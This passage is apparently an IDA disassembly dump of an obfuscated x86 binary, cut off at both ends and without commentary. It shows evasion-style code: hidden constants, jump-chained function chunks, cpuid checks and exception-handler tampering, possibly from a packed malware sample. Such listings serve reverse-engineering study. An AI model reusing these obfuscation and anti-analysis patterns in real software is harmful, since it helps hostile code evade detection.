sub eax, 0C7B44E1Fh
xor eax, 0B3C50BAEh
jmp loc_424734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_42AAAA: ; CODE XREF: sub_425EA5+85FE�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D387
loc_42AAAE: ; CODE XREF: sub_42D387+9�j
jmp loc_42E946
; END OF FUNCTION CHUNK FOR sub_42D387
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_42AAB3: ; CODE XREF: sub_425EA5+6�j
; sub_423A2A:loc_42DB84�j
mov eax, [ebp-0Ch]
loc_42AAB6: ; CODE XREF: _0182ofla:00426156�j
call sub_42561D
loc_42AABB: ; CODE XREF: sub_423A2A+7215�j
ror eax, 3
sub edi, esi
ror ecx, 1Ch
loc_42AAC3: ; CODE XREF: sub_423A2A:loc_4243E6�j
push edi
push 0D2148446h
pop edi
rol edi, 1Ch
jmp loc_42D455
; END OF FUNCTION CHUNK FOR sub_425EA5
; =============== S U B R O U T I N E =======================================
sub_42AAD2 proc near ; CODE XREF: _0182ofla:00425564�j
; sub_42C677+13�p
; FUNCTION CHUNK AT 00427405 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042ADF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF45 SIZE 00000012 BYTES
mov [esp+0], edi
pop edi
mov ds:dword_427A44, eax
jmp loc_42ADF3
sub_42AAD2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AAE0 proc near ; CODE XREF: sub_426561�j
; FUNCTION CHUNK AT 004273EC SIZE 00000019 BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_427A44, 0
jnz loc_427405
loc_42AAF1: ; CODE XREF: sub_428CE6+4�j
jmp loc_4273EC
sub_42AAE0 endp
; ---------------------------------------------------------------------------
loc_42AAF6: ; CODE XREF: _0182ofla:00424A53�j
sbb ecx, ebx
; =============== S U B R O U T I N E =======================================
sub_42AAF8 proc near ; CODE XREF: sub_423B53:loc_42A781�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423FC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004241C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424549 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00425B66 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425F72 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004297DB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A2E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE5F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B7CB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C858 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E5D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042EDC4 SIZE 0000000B BYTES
mov [esp+4+var_4], ecx
pop ecx
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_42D214, 0
jnz loc_42A0FA
jmp loc_4241C6
sub_42AAF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42AB13: ; CODE XREF: sub_429E52-1C52�j
jnz loc_42481C
jmp loc_42AB75
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_42AB1E: ; CODE XREF: sub_428041+5C4A�j
xchg esi, [esp+10h+var_10]
jmp loc_425E48
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AB27 proc near ; CODE XREF: sub_423A2A:loc_42B41E�p
; sub_425DA5+6FBB�j ...
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
; FUNCTION CHUNK AT 00424CA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426812 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429343 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293E6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A681 SIZE 00000018 BYTES
push ebp
mov ebp, esp
jns sub_429C1A
add esp, 0FFFFFFE0h
jmp loc_429343
sub_42AB27 endp
; ---------------------------------------------------------------------------
loc_42AB38: ; CODE XREF: _0182ofla:0042E56F�j
jnb loc_42A699
; =============== S U B R O U T I N E =======================================
sub_42AB3E proc near ; CODE XREF: sub_425D8F+6�p
; FUNCTION CHUNK AT 00423490 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004235D8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004238D2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004246E6 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00425A2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426504 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429438 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A3C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B073 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C25A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042C27E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042CA90 SIZE 00000010 BYTES
xchg edx, [esp+0]
pop edx
pop edi
push edi
jmp loc_4238D2
sub_42AB3E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4286E4
loc_42AB49: ; CODE XREF: sub_4286E4+1E�j
call sub_4265C0
jmp loc_4259AB
; END OF FUNCTION CHUNK FOR sub_4286E4
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
loc_42AB5A: ; CODE XREF: _0182ofla:loc_425FA2�j
; _0182ofla:0042CA24�j
mov eax, [ebp-8]
mov esp, ebp
jmp loc_42AB70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB00
loc_42AB64: ; CODE XREF: sub_42CB00+1C�j
jz loc_42EB91
jmp loc_42E3B6
; END OF FUNCTION CHUNK FOR sub_42CB00
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42AB70: ; CODE XREF: _0182ofla:0042AB5F�j
jmp loc_4265B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42AB75: ; CODE XREF: sub_429E52+CC7�j
jz loc_42956B
jmp loc_42546C
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42AB80: ; CODE XREF: sub_428F20+B73�j
jge sub_42C89F
loc_42AB86: ; CODE XREF: sub_428F20:loc_42B1E8�j
mov edi, eax
mov eax, 80000001h
xor edx, edx
cpuid
and eax, 0FFFh
jmp loc_423086
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_42AB9B proc near ; CODE XREF: sub_42E668-B313�j
; sub_42EAFE+B�p
; FUNCTION CHUNK AT 00423E9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424636 SIZE 0000000A BYTES
mov [esp+0], esi
pop esi
or eax, eax
jnz loc_424636
call sub_4247FE
test eax, eax
setnz byte ptr [ebp-1]
jmp loc_424636
sub_42AB9B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42ABB7 proc near ; CODE XREF: sub_42892E�j
; FUNCTION CHUNK AT 0042D046 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042DB1A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042EB18 SIZE 0000000B BYTES
push ebp
jmp loc_42DB1A
sub_42ABB7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_42ABBD: ; CODE XREF: sub_427942-2669�j
or ecx, 61C938BAh
loc_42ABC3: ; CODE XREF: _0182ofla:loc_4285D3�j
add eax, edx
xor eax, ebx
add eax, ecx
call sub_424762
loc_42ABCE: ; CODE XREF: sub_428EB9+2E3�j
push eax
cmp [ebp+var_14], 6
setz al
call sub_42ECAD
pop ecx
shl eax, 3
loc_42ABDF: ; CODE XREF: sub_423395:loc_427D65�j
call sub_42798F
loc_42ABE4: ; CODE XREF: sub_4294FE-6034�j
jmp loc_42D4CC
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42ABE9: ; CODE XREF: sub_428D63-357B�j
; sub_428D63:loc_427479�j ...
jns loc_429022
cmp dword ptr [ebp-4], 3
jnz loc_4244E9
jmp loc_4291CC
; ---------------------------------------------------------------------------
loc_42ABFE: ; CODE XREF: sub_42798F:loc_429A05�j
mov [ebx], ebp
and eax, ebx
jmp loc_42A62D
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AC07 proc near ; DATA XREF: sub_4271D2:loc_42589C�o
; FUNCTION CHUNK AT 00423095 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423185 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042478A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426E1A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427BB3 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042C6E5 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_423194
jmp loc_426E1A
sub_42AC07 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_42AC19: ; CODE XREF: sub_427239:loc_42E697�j
xchg ecx, esi
push 0CD5101FCh
pop ecx
or ecx, 595F0E5Ch
xor ecx, 78D42139h
jmp loc_42EBF0
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
adc edi, ebx
jmp sub_424762
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42AC39: ; CODE XREF: sub_423A2A+9C2�j
xor ebx, 2CE2111Ah
jmp loc_42AABB
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42AC44: ; CODE XREF: sub_4253F4+9784�j
pop edi
and edi, 7EBC0D58h
test edi, 200000h
jmp loc_425E91
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42AC56: ; CODE XREF: sub_428EB9+2DA�j
; sub_428EB9+5B33�j
cmp dword ptr [ebp-10h], 1
jnz loc_42D9E8
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
push offset loc_42D9E0
jmp nullsub_184
; END OF FUNCTION CHUNK FOR sub_428EB9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42AC7A: ; CODE XREF: sub_42C379-104D�j
jmp loc_42D3CE
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
loc_42AC7F: ; CODE XREF: _0182ofla:0042765E�j
jmp loc_42B440
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_42AC84: ; CODE XREF: sub_425063:loc_429F9E�j
jnz loc_424677
jmp loc_425EC5
; END OF FUNCTION CHUNK FOR sub_425063
; ---------------------------------------------------------------------------
loc_42AC8F: ; CODE XREF: _0182ofla:0042C431�j
adc esi, ecx
loc_42AC91: ; CODE XREF: _0182ofla:loc_42ACE2�j
call sub_423FCD
test al, al
jz loc_42797C
jmp loc_42B293
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429F6C
loc_42ACA3: ; CODE XREF: sub_429F6C+8�j
push 0FD0802Bh
pop edx
xor edx, 97971221h
add edx, 67FA9FA6h
call sub_424184
loc_42ACBA: ; CODE XREF: _0182ofla:004241EC�j
mov [esi], eax
pop esi
cmp ds:dword_4257A4, 0
; END OF FUNCTION CHUNK FOR sub_429F6C
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_42ACC4: ; CODE XREF: sub_428F0F:loc_4283D2�j
jnz loc_42E5E3
jmp loc_423ADF
; END OF FUNCTION CHUNK FOR sub_428F0F
; =============== S U B R O U T I N E =======================================
sub_42ACCF proc near ; DATA XREF: sub_42A51F+3�o
; FUNCTION CHUNK AT 00429D17 SIZE 00000005 BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
push offset loc_425980
jmp loc_429D17
sub_42ACCF endp
; ---------------------------------------------------------------------------
loc_42ACE2: ; CODE XREF: _0182ofla:00426DE9�j
jnz loc_42AC91
jmp loc_423574
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4299B8
loc_42ACED: ; CODE XREF: sub_4299B8+9�j
mov edx, offset loc_42ACFB
xchg edx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_4299B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42ACF6: ; CODE XREF: sub_423FCD+8684�j
jmp nullsub_177
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_42ACFB: ; DATA XREF: sub_4299B8:loc_42ACED�o
xor edx, 0B2B4909Bh
or edx, 86CD3D39h
xor edx, 0EFCDFF3Dh
test eax, edx
jmp loc_429649
; ---------------------------------------------------------------------------
loc_42AD14: ; DATA XREF: sub_4256E8+ABE�o
add ebx, 54496A1Eh
popf
call sub_424E62
; =============== S U B R O U T I N E =======================================
sub_42AD20 proc near ; CODE XREF: sub_42940E:loc_426FF9�p
; _0182ofla:0042D442�j
mov [esp+0], edi
pop edi
ror eax, 14h
mov ds:dword_4231A0, eax
retn
sub_42AD20 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DB
loc_42AD2E: ; CODE XREF: sub_4278DB+1911�j
jmp sub_4258B7
; END OF FUNCTION CHUNK FOR sub_4278DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_42AD33: ; CODE XREF: sub_42940E:loc_4250CF�j
; sub_429C68+4AAE�j
rol eax, 14h
push eax
jmp loc_4258B1
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D19B
loc_42AD3C: ; CODE XREF: sub_42D19B+E�j
add ecx, 0FF842Eh
and ecx, 39933F80h
xor ecx, 10833C84h
add eax, ecx
pop ecx
jmp loc_42E1AB
; END OF FUNCTION CHUNK FOR sub_42D19B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0B2
loc_42AD56: ; CODE XREF: sub_42A0B2+10�j
call sub_42E320
push eax
push esi
push 8F84594Ch
; END OF FUNCTION CHUNK FOR sub_42A0B2
; START OF FUNCTION CHUNK FOR sub_425629
loc_42AD62: ; CODE XREF: sub_425629-1759�j
pop esi
add esi, 70BE5425h
xchg esi, [esp+4+var_4]
jmp loc_42754D
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
push 0AF318DBBh
jmp loc_423510
; ---------------------------------------------------------------------------
loc_42AD7B: ; CODE XREF: _0182ofla:0042E95F�j
cmp ebp, 4F1C016Fh
jmp loc_4256C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_42AD86: ; CODE XREF: sub_427942:loc_426C9D�j
mov eax, [eax]
call sub_42794C
loc_42AD8D: ; CODE XREF: sub_428205-2725�j
jmp loc_4287A3
; END OF FUNCTION CHUNK FOR sub_427942
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42892E
loc_42AD93: ; CODE XREF: sub_42892E+19E9�j
jmp nullsub_75
; END OF FUNCTION CHUNK FOR sub_42892E
; ---------------------------------------------------------------------------
loc_42AD98: ; CODE XREF: _0182ofla:004253D1�j
jmp loc_423549
; ---------------------------------------------------------------------------
loc_42AD9D: ; CODE XREF: _0182ofla:00423D18�j
jmp loc_424249
; ---------------------------------------------------------------------------
rol eax, 16h
loc_42ADA5: ; CODE XREF: _0182ofla:0042E625�j
jmp loc_42B664
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428176
loc_42ADAB: ; CODE XREF: sub_428176+3FC�j
jmp loc_4262DD
; END OF FUNCTION CHUNK FOR sub_428176
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_42ADB0: ; CODE XREF: sub_42D03E-62C1�j
jmp nullsub_126
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42ADB5: ; CODE XREF: sub_42326C:loc_42D28B�j
jl loc_4247A7
loc_42ADBB: ; CODE XREF: _0182ofla:0042E771�j
jmp loc_42B6EB
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
rol edx, 2
xchg ebx, [edx]
jmp loc_42B80B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42ADCA: ; CODE XREF: sub_42E5F8:loc_42E858�j
not ebp
pop ebp
jmp loc_42A729
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_42ADD2: ; CODE XREF: sub_42B3C2-8008�j
; DATA XREF: sub_42D056-1CA8�o
pop dword ptr fs:0
xchg eax, [esp-4+arg_0]
pop eax
loc_42ADDC: ; CODE XREF: _0182ofla:loc_426058�j
push ebx
push ecx
jmp loc_426940
; END OF FUNCTION CHUNK FOR sub_42B3C2
; =============== S U B R O U T I N E =======================================
sub_42ADE3 proc near ; CODE XREF: sub_42D8EA-1334�p
; FUNCTION CHUNK AT 0042D49A SIZE 00000017 BYTES
mov [esp+0], eax
pop eax
add eax, ebp
call sub_424950
loc_42ADEE: ; CODE XREF: _0182ofla:0042AF24�j
jmp loc_42D49A
sub_42ADE3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAD2
loc_42ADF3: ; CODE XREF: sub_42AAD2+9�j
jmp loc_427405
; END OF FUNCTION CHUNK FOR sub_42AAD2
; ---------------------------------------------------------------------------
add ecx, edi
jmp loc_42A436
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAFE
loc_42ADFF: ; CODE XREF: sub_42EAFE:loc_42EB0E�j
push 75E15426h
pop esi
add esi, 8A618BADh
popf
xchg esi, [esp-4+arg_0]
jmp loc_42C6D6
; END OF FUNCTION CHUNK FOR sub_42EAFE
; =============== S U B R O U T I N E =======================================
sub_42AE14 proc near ; DATA XREF: _0182ofla:loc_427023�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E933 SIZE 00000005 BYTES
push eax
pushf
push 79E72C9Ah
pop eax
add eax, 865B61D4h
popf
xchg eax, [esp+4+var_4]
jmp loc_42E933
sub_42AE14 endp
; ---------------------------------------------------------------------------
loc_42AE2B: ; DATA XREF: sub_425AE5:loc_425AF6�o
jz loc_42D4C0
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42AE31: ; CODE XREF: sub_425BF8-27AA�j
; sub_425BF8-4D6�j ...
jz loc_42ED73
or eax, eax
jz loc_42D4BE
cmp eax, 0FFFFFFFFh
jz loc_42D4BE
mov eax, [eax]
jmp loc_42550D
; END OF FUNCTION CHUNK FOR sub_425BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B500
loc_42AE50: ; CODE XREF: sub_42B500+C�j
jmp loc_42A237
; END OF FUNCTION CHUNK FOR sub_42B500
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42AE55: ; CODE XREF: sub_42537E+397C�j
jmp nullsub_239
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DE2
loc_42AE5A: ; CODE XREF: sub_424DE2+8�j
jmp nullsub_76
; END OF FUNCTION CHUNK FOR sub_424DE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42AE5F: ; CODE XREF: sub_42AAF8-692C�j
cdq
shl esi, 17h
add esi, 31C3ABFAh
jz loc_42E5D3
loc_42AE6F: ; CODE XREF: sub_42DD2A:loc_4286C2�j
jmp loc_424549
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42AE74: ; CODE XREF: sub_427259+518E�j
rol eax, 3
xchg eax, ebx
push ebx
xchg eax, ebx
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_427259
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AE82 proc near ; DATA XREF: _0182ofla:0042689F�o
; sub_42D056+DCC�o
push ebp
mov ebp, esp
jmp sub_424BCB
sub_42AE82 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_42AE8A: ; CODE XREF: sub_428729-5113�j
; sub_428729:loc_42C57F�j
push 57CB4B26h
pop eax
xor eax, 29C49845h
add eax, ebp
jmp loc_42CEEB
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_42AE9D: ; CODE XREF: sub_423AF2+2B15�j
; sub_423AF2:loc_42B791�j
or ebx, ds:4000F5h
add ebx, 518443D2h
xchg ebx, [esp+0]
jmp sub_428F46
; END OF FUNCTION CHUNK FOR sub_423AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42AEB1: ; CODE XREF: sub_42B15E:loc_429F99�j
mov dword ptr [ecx], offset loc_4278F2
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_42AEBB: ; CODE XREF: _0182ofla:loc_42CD3F�j
pop ebx
pop ecx
pop ebp
jmp loc_4283D7
; ---------------------------------------------------------------------------
loc_42AEC3: ; CODE XREF: _0182ofla:loc_426F6D�j
or ecx, edx
push 229FE4ADh
pop edx
or edx, 7F937343h
add edx, 0C237722Eh
jmp loc_424BB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CD0
loc_42AEDC: ; CODE XREF: sub_427CD0:loc_42CB80�j
sub eax, 0FF86BA4Bh
push offset sub_42A092
jmp loc_4272B9
; END OF FUNCTION CHUNK FOR sub_427CD0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42AEED: ; CODE XREF: sub_42798F+725C�j
jmp loc_42C5C5
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CEA4
loc_42AEF2: ; CODE XREF: sub_42CEA4+D�j
jmp loc_428C35
; END OF FUNCTION CHUNK FOR sub_42CEA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_42AEF7: ; CODE XREF: sub_425C89+1C38�j
jmp loc_42A1CE
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_42AEFC: ; CODE XREF: sub_426020+1F3C�j
; sub_426020:loc_42CEFD�j
push edi
push 2D2E1B1Fh
pop edi
rol edi, 13h
cmp edi, 5C5E1F65h
jmp loc_4268B9
; END OF FUNCTION CHUNK FOR sub_426020
; ---------------------------------------------------------------------------
xchg esi, [esp]
mov edx, esi
pop esi
push eax
push 0B152008Dh
pop edx
xor edx, 4EADFF72h
jmp loc_42ADEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42AF29: ; CODE XREF: sub_428D63+29FF�j
mov esi, 96368028h
loc_42AF2E: ; CODE XREF: sub_428D63:loc_424FF5�j
lea eax, [ebp-2AAh]
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_424025
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAD2
loc_42AF45: ; CODE XREF: sub_42AAD2-36C8�j
call sub_424CD8
mov esp, ebp
pop ebp
call sub_4243F2
loc_42AF52: ; CODE XREF: sub_42B640+9�j
jmp sub_425D9A
; END OF FUNCTION CHUNK FOR sub_42AAD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427906
loc_42AF57: ; CODE XREF: sub_427906:loc_427916�j
jmp loc_42DB49
; END OF FUNCTION CHUNK FOR sub_427906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425AB1
loc_42AF5C: ; CODE XREF: sub_425AB1-1D5D�j
jmp loc_4284F0
; END OF FUNCTION CHUNK FOR sub_425AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_42AF61: ; CODE XREF: sub_42DF41-8A4F�j
; sub_42DF41:loc_425B5B�j
call sub_4247FE
mov edx, 87C4571Ah
call sub_42D71D
xchg eax, ebp
push ebp
xchg eax, ebp
ror eax, 1Bh
mov ds:dword_42D104, eax
jmp loc_42C372
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423726
loc_42AF83: ; CODE XREF: sub_423726+1D�j
add edi, ecx
add edi, 0DBCF1B80h
mov [edi], eax
pop edi
jmp loc_427078
; END OF FUNCTION CHUNK FOR sub_423726
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42AF93: ; CODE XREF: sub_42D056-4744�j
add eax, 7D0h
jmp loc_428428
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42AF9D: ; CODE XREF: sub_425B00+77C4�j
pop ecx
mov [ebp-20h], eax
loc_42AFA1: ; CODE XREF: sub_425B00+12AF�j
; sub_425B00:loc_428A5A�j ...
jnz loc_429096
test byte ptr [ebp-8], 40h
jz loc_42A779
push ebp
mov eax, [ebp-20h]
jmp loc_42D073
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
sub_42AFBA proc near ; DATA XREF: sub_42D591+3�o
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_42B8F8[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz loc_42A9B2
jmp loc_42D607
sub_42AFBA endp
; ---------------------------------------------------------------------------
locret_42AFD9: ; CODE XREF: _0182ofla:00424655�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42AFDA: ; CODE XREF: sub_42C553:loc_42DDE9�j
jmp loc_42CC43
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42AFDF: ; CODE XREF: sub_42798F+3E37�j
jmp loc_42A22E
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42AFE4: ; CODE XREF: _0182ofla:loc_4285E4�j
shr edx, 3
mov ecx, ds:dword_423190
jz loc_42B5EA
or [ecx+edx], al
mov eax, [ebp-0Ch]
push eax
jmp loc_42ECC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42AFFF: ; CODE XREF: sub_423395+1CE7�j
sub eax, 0C0113AEAh
xor eax, 0EA968B14h
add eax, ebp
add eax, 95098D03h
mov dword ptr [eax], 70736957h
push 17AA6FB4h
pop eax
rol eax, 0Ch
jmp loc_42B103
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
loc_42B027: ; CODE XREF: _0182ofla:0042C5D5�j
adc ebx, 0AD476FE6h
loc_42B02D: ; CODE XREF: _0182ofla:loc_426144�j
or edx, 36DA7FC3h
add edx, 0B3DE1A2Eh
call sub_42D71D
call sub_429242
jmp loc_42D0A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E4D
loc_42B048: ; CODE XREF: sub_425E4D:loc_425164�j
mov eax, ds:dword_42D110
push offset sub_42E689
jmp loc_423846
; END OF FUNCTION CHUNK FOR sub_425E4D
; ---------------------------------------------------------------------------
sbb ecx, 0BA04DE37h
jmp loc_42E662
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_42B063: ; CODE XREF: sub_428041:loc_424025�j
jnz loc_42A0CF
jmp loc_4231B8
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
call sub_427967
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_42B073: ; CODE XREF: sub_42AB3E-1700�j
